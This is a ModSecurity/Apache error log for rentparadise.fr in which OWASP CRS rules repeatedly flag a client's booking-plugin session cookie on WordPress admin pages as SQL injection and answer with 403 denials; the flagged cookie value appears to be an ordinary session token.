[Mon May 11 18:30:27.050121 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIEIw-Qm4vhlWBPlMjlcQAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:27.050427 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIEIw-Qm4vhlWBPlMjlcQAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:27.608233 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEIw-Qm4vhlWBPlMjlcQAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:27.698305 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIEIw-Qm4vhlWBPlMjlcgAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:27.698593 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIEIw-Qm4vhlWBPlMjlcgAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:28.069647 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEIw-Qm4vhlWBPlMjlcgAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:28.369634 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIEJA-Qm4vhlWBPlMjlcwAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:28.369932 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIEJA-Qm4vhlWBPlMjlcwAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:28.984179 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEJA-Qm4vhlWBPlMjlcwAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:30.003606 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIEJg-Qm4vhlWBPlMjldgAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:30.003900 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIEJg-Qm4vhlWBPlMjldgAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:30.670042 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEJg-Qm4vhlWBPlMjldgAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:31.047664 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIEJw-Qm4vhlWBPlMjleAAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:31.048107 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIEJw-Qm4vhlWBPlMjleAAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:31.724355 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEJw-Qm4vhlWBPlMjleAAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:32.284035 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIEKA-Qm4vhlWBPlMjleQAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:32.284356 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIEKA-Qm4vhlWBPlMjleQAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:32.925101 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEKA-Qm4vhlWBPlMjleQAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:33.044064 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIEKQ-Qm4vhlWBPlMjlewAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:33.044386 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIEKQ-Qm4vhlWBPlMjlewAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:33.662695 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEKQ-Qm4vhlWBPlMjlewAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:33.747374 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIEKQ-Qm4vhlWBPlMjlfAAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:33.747668 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIEKQ-Qm4vhlWBPlMjlfAAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:34.132866 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEKQ-Qm4vhlWBPlMjlfAAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:34.439104 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIEKg-Qm4vhlWBPlMjlfgAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:34.439511 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIEKg-Qm4vhlWBPlMjlfgAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:35.048960 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEKg-Qm4vhlWBPlMjlfgAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:35.379939 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIEKw-Qm4vhlWBPlMjlgAAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:35.380272 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIEKw-Qm4vhlWBPlMjlgAAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:36.001933 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEKw-Qm4vhlWBPlMjlgAAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:36.295315 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIELA-Qm4vhlWBPlMjlgQAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:36.295597 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIELA-Qm4vhlWBPlMjlgQAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:36.906564 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIELA-Qm4vhlWBPlMjlgQAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:37.146357 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIELQ-Qm4vhlWBPlMjlgwAAAAM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:37.146665 2026] [security2:error] [pid 1411099:tid 1411104] [client 31.57.184.104:58873] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIELQ-Qm4vhlWBPlMjlgwAAAAM"], referer: https://rentparadise.fr/wp-login.php
